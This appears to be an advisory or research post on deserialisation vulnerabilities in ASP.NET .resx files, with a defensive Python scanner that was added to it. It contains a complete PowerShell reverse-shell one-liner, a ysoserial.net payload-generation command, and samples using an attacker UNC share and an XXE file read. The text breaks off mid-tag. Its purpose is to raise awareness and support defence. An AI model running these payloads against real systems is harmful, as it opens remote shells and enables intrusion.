ASP.NET resource files (.RESX) and deserialisation vulnerability research - exploit warning - Black Bar Safety Net

2018-08-08 00:00:00
Anonymous
www.myhack58.com

CVSS3: 7.8 High
CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack Vector: LOCAL | Attack Complexity: LOW | Privileges Required: NONE | User Interaction: REQUIRED | Scope: UNCHANGED | Confidentiality Impact: HIGH | Integrity Impact: HIGH | Availability Impact: HIGH

CVSS2: 9.3 High
AV:N/AC:M/Au:N/C:C/I:C/A:C
Access Vector: NETWORK | Access Complexity: MEDIUM | Authentication: NONE | Confidentiality Impact: COMPLETE | Integrity Impact: COMPLETE | Availability Impact: COMPLETE

EPSS: 0.09 Low (percentile 94.0%)

Resource files in ASP.NET applications are typically used as localised storage: they hold user-interface elements or strings that can easily be translated [1]. These resource files normally use the .resx extension; when compiled for use by the application they use the .resources extension. More information on resource files is available on Microsoft's website [2, 3].
Although .resx files are in XML format, they can still contain serialised objects: a binary serialised object can be stored base64-encoded inside the .resx file. Resource files support BinaryFormatter, SoapFormatter and TypeConverters, all of which can be abused to deserialise insecure objects or to load an external file.
This article discusses this attack vector in more detail in order to raise awareness of it. The research was inspired by the paper "Friday the 13th JSON Attacks" by Alvaro Muñoz and Oleksandr Mirosh.

The patches and the remaining problem
I reported the deserialisation issues in .resx and .resources resource files to Microsoft as early as January 2018, but it was not until July 2018 that Microsoft released several patches across multiple products (for example CVE-2018-8172 and CVE-2018-8300); before that, SharePoint and Visual Studio both processed resource files in an insecure way [7].
After the July 2018 patches, .resx and .resources files carrying the Mark of the Web (MOTW) [8] can no longer be opened directly in Visual Studio. When MOTW is present, the resgen.exe tool [9] displays an error and the winres.exe tool [10] always displays a warning. Note that files extracted from a zip archive, or downloaded with a browser other than IE or Edge, may not carry MOTW, so they should be handled with more caution.
The System.Resources namespace documentation on the Microsoft Developer Center (MSDN) [11] has also been updated: the ResourceManager, ResourceReader and ResourceSet classes now carry the following security note:
"Calling methods in this class with untrusted data is a security risk. Call the methods in the class only with trusted data. For more information, see Untrusted Data Security Risks".
It should be noted that the behaviour of the System.Resources methods has not changed. Any application that uses the ASP.NET libraries to read, compile or decompile resource files (for example [12] and [13]) may therefore be attacked if it accepts user-supplied resource files.

Why the System.Resources namespace cannot simply be fixed
Because the types of the serialised objects in a resource file cannot be known in advance, malicious code execution cannot be prevented by inspecting the deserialisation for unsafe types. Some protection can be added for the BinaryFormatter path, but that is not enough to stop every attack, because SoapFormatter or a TypeConverter can be used as an alternative route to bypass it.
Resource files can also reference a local file or a network share through a UNC path, which in turn can lead to lesser risks such as file enumeration or SMB hash capture. When the target is a client-side tool, SMB hash capture becomes the more serious risk.
Because .resx files are XML, a custom parser that reads resource files with a general-purpose XML library may be vulnerable to XML external entity (XXE) attacks. By default, however, the ResXResourceReader class uses an XmlTextReader that does not process the document type definition (DTD).
Technical details
The mimetype attribute of the data and metadata tags in a resource file can be used to deserialise an object; the type attribute can additionally be used to deserialise an object through a TypeConverter.
Deserialisation via BinaryFormatter and SoapFormatter
In the following cases the object in the resource file is deserialised with BinaryFormatter (System.Runtime.Serialization.Formatters.Binary.BinaryFormatter):
- the mimetype attribute of a data tag is empty; or
- the mimetype attribute of a data or metadata tag is one of:
application/x-microsoft.net.object.binary.base64
text/microsoft-urt/psuedoml-serialized/base64
text/microsoft-urt/binary-serialized/base64
In the following cases the object in the resource file is deserialised with SoapFormatter (System.Runtime.Serialization.Formatters.Soap.SoapFormatter):
- the mimetype attribute of a data or metadata tag is one of:
application/x-microsoft.net.object.soap.base64
text/microsoft-urt/soap-serialized/base64
The source code [14] shows that the SoapFormatter path is not reached through System.Web; it can still be triggered, however, by uploading a resource file into an ASP.NET web application's resource folder.
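The checks described in the three preceding sections (the mimetype values that route a value to BinaryFormatter or SoapFormatter, a type attribute that hands the value to a TypeConverter, a ResXFileRef pointing at a UNC path, and the DTD/XXE caveat) can be turned into a triage scanner for untrusted .resx files. The scanner below is an added example; it is not code from the original article, from ysoserial.net or from Microsoft's System.Resources classes. It assumes the mimetype lists given above are the complete set, uses a constructed sample file, and the host name and payload bytes in that sample are made up for illustration. It only inspects bytes and never deserialises anything.

```python
"""Triage scanner for untrusted .resx files (added example, not from the article)."""
import base64
import re
import xml.etree.ElementTree as ET

# mimetype values that route a <data>/<metadata> value to BinaryFormatter
BINARY_MIMETYPES = {
    "application/x-microsoft.net.object.binary.base64",
    "text/microsoft-urt/psuedoml-serialized/base64",
    "text/microsoft-urt/binary-serialized/base64",
}
# mimetype values that route a value to SoapFormatter
SOAP_MIMETYPES = {
    "application/x-microsoft.net.object.soap.base64",
    "text/microsoft-urt/soap-serialized/base64",
}
# ResXFileRef values are "path;type[;encoding]"; the reader opens the path
FILEREF_TYPE = "System.Resources.ResXFileRef"
UNC_PATH = re.compile(r"^\\\\[^\\\s]+\\")
# Every BinaryFormatter stream starts with SerializationHeaderRecord (0x00),
# RootId=1, HeaderId=-1, i.e. base64 "AAEAAAD/////"
BINFMT_HEADER = b"\x00\x01\x00\x00\x00\xff\xff\xff\xff"


def _value_text(node):
    v = node.find("value")
    return (v.text or "").strip() if v is not None else ""


def scan_resx(xml_text: str) -> list:
    """Return findings as dicts {"name", "kind", "detail"} (+ "header_ok" for binary)."""
    findings = []
    # A .resx never needs a DTD, so refuse one instead of trusting the
    # downstream reader's XML library to ignore it (XXE caveat above).
    if re.search(r"<!DOCTYPE", xml_text, re.IGNORECASE):
        findings.append({"name": None, "kind": "dtd",
                         "detail": "DOCTYPE present; possible XXE against a custom reader"})
        return findings
    root = ET.fromstring(xml_text.encode("utf-8"))
    for node in root.iter():
        if node.tag not in ("data", "metadata"):
            continue
        name = node.get("name", "")
        mimetype = (node.get("mimetype") or "").strip()
        type_attr = (node.get("type") or "").strip()
        value = _value_text(node)
        if mimetype in BINARY_MIMETYPES:
            header_ok = False
            try:  # confirm the base64 really is a BinaryFormatter stream
                raw = base64.b64decode("".join(value.split()), validate=True)
                header_ok = raw.startswith(BINFMT_HEADER)
            except ValueError:
                pass
            findings.append({"name": name, "kind": "BinaryFormatter",
                             "detail": mimetype, "header_ok": header_ok})
        elif mimetype in SOAP_MIMETYPES:
            findings.append({"name": name, "kind": "SoapFormatter", "detail": mimetype})
        elif type_attr.startswith(FILEREF_TYPE):
            path = value.split(";", 1)[0].strip()
            kind = "unc-fileref" if UNC_PATH.match(path) else "fileref"
            findings.append({"name": name, "kind": kind, "detail": path})
        elif type_attr and not type_attr.startswith("System.String"):
            # non-string type and no mimetype: value goes through the type's TypeConverter
            findings.append({"name": name, "kind": "typeconverter", "detail": type_attr})
        elif mimetype:
            findings.append({"name": name, "kind": "unknown-mimetype", "detail": mimetype})
    return findings


# Constructed sample (not a real project's file): one ordinary localised string,
# then one entry for each risky route. The host name and payload bytes are made up.
_BIN_VALUE = base64.b64encode(BINFMT_HEADER + b"\x01\x00\x00\x00\x00\x00\x00\x00").decode()
SAMPLE_RESX = r"""<root>
  <resheader name="resmimetype"><value>text/microsoft-resx</value></resheader>
  <data name="greeting" xml:space="preserve"><value>Hello</value></data>
  <data name="payload" mimetype="application/x-microsoft.net.object.binary.base64">
    <value>%s</value>
  </data>
  <metadata name="soap_payload" mimetype="text/microsoft-urt/soap-serialized/base64">
    <value>PFNPQVAtRU5WOkVudmVsb3BlPg==</value>
  </metadata>
  <data name="logo" type="System.Resources.ResXFileRef, System.Windows.Forms">
    <value>\\attacker\share\logo.png;System.Drawing.Bitmap, System.Drawing</value>
  </data>
  <data name="origin" type="System.Drawing.Point, System.Drawing">
    <value>1, 2</value>
  </data>
</root>""" % _BIN_VALUE

# Constructed sample carrying a DTD, which the scanner rejects before parsing.
SAMPLE_XXE = """<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">]>
<root><data name="x"><value>&xxe;</value></data></root>"""

if __name__ == "__main__":
    for sample in (SAMPLE_RESX, SAMPLE_XXE):
        for f in scan_resx(sample):
            print(f)
```

Running the block prints one finding per risky entry in the sample (BinaryFormatter with a valid stream header, SoapFormatter, a UNC ResXFileRef and a TypeConverter type) and a single "dtd" finding for the second sample; the plain "greeting" string produces nothing. In a real pipeline the findings list is the gate: a file with any finding should not reach ResXResourceReader, resgen.exe or a compile step.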
The ysoserial.net project [15] can be used to generate a payload for this deserialisation issue. The following example shows how to generate a payload that starts a reverse PowerShell shell:

# Reverse shell one-liner; single quotes keep the inner $variables unexpanded until the target runs it
$command = '$client = New-Object System.Net.Sockets.TCPClient("remote_IP_here", remote_PORT_here);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
# -encodedCommand expects the script as base64 of its UTF-16LE bytes
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
./ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o base64 -c "powershell.exe -encodedCommand $encodedCommand"
The resulting payload is then placed in the resource file as shown below:
[Resource file with the default schema and headers redacted]
<data name="test1_BinaryFormatter" mimetype="application/x-microsoft.net.object.binary.base64">
